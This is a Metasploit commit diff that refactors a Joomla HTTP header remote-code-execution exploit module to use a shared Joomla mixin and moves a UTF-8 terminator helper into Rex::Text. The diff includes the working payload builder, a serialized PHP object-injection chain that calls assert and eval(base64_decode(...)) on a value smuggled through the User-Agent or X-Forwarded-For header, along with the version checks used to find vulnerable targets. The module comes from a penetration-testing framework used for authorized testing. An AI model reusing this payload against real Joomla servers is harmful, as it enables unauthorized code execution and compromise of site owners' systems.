Land rapid7#6387, update exploits/multi/http/joomla_http_header_rce

Use the new Joomla mixin

Author: wchen-r7

lib/rex/text.rb

@@ -1477,6 +1477,18 @@ def self.to_guid(bytes)
     "{#{parts.join('-')}}"
   end
 
+  #
+  # Generate a valid random 4 byte UTF-8 character
+  # valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF
+  #
+  # @example
+  #   Rex::Text.rand_4byte_utf8 # => "\u{108CF3}"
+  #
+  # @return [String]
+  def self.rand_4byte_utf8
+    [rand(0x10000..0x10ffff)].pack('U*')
+  end
+
   #
   # Creates a pattern that can be used for offset calculation purposes.  This
   # routine is capable of generating patterns using a supplied set and a

modules/exploits/multi/http/joomla_http_header_rce.rb

@@ -8,7 +8,7 @@
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Joomla
 
   def initialize(info = {})
     super(update_info(info,
@@ -49,7 +49,6 @@ def initialize(info = {})
 
     register_options(
       [
-        OptString.new('TARGETURI', [ true,  'The path to joomla', '/' ]),
         OptEnum.new('HEADER', [ true,  'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])
       ], self.class)
 
@@ -72,6 +71,12 @@ def check
       return Exploit::CheckCode::Unknown
     end
 
+    online = joomla_and_online?
+    unless online
+      vprint_error("Unable to detect joomla on #{target_uri.path}")
+      return Exploit::CheckCode::Safe
+    end
+
     php_version, rest = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)(?:-(.+))?/i).flatten || ''
     version = Gem::Version.new(php_version)
     vulnerable = false
@@ -120,40 +125,23 @@ def check
       return Exploit::CheckCode::Safe
     end
 
-    res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })
-    if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
-      joomla_version = res.body.scan(/<version>([\d\.]+)<\/version>/i).flatten.first || ''
-      unless joomla_version.empty?
-        vprint_status("Detected Joomla version #{joomla_version}")
-        return Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
-      end
+    j_version = joomla_version
+    unless j_version.nil?
+      vprint_status("Detected Joomla version #{j_version}")
+      return Exploit::CheckCode::Appears if Gem::Version.new(j_version) < Gem::Version.new('3.4.6')
     end
 
-    res.get_html_meta_elements.each do |element|
-      if element.attributes['name'] &&
-        /^generator$/i === element.attributes['name'] &&
-        element.attributes['content'] &&
-        /joomla/i === element.attributes['content'].value
-        return Exploit::CheckCode::Detected
-      end
-    end
+    return Exploit::CheckCode::Detected if online
 
     Exploit::CheckCode::Safe
   end
 
-  # gets a random 4 byte UTF-8 character
-  def get_terminator
-    # valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF
-    [rand(0x10000..0x10ffff)].pack('U*')
-  end
-
   def get_payload(header_name)
     pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
     pre_pay = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
     pay = "eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;"
     post_pay = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
-    t1000 = get_terminator
-    return "#{pre}#{pre_pay}s:#{pay.length}:\"#{pay}#{post_pay}#{t1000}"
+    return "#{pre}#{pre_pay}s:#{pay.length}:\"#{pay}#{post_pay}#{Rex::Text::rand_4byte_utf8}"
   end
 
   def print_status(msg='')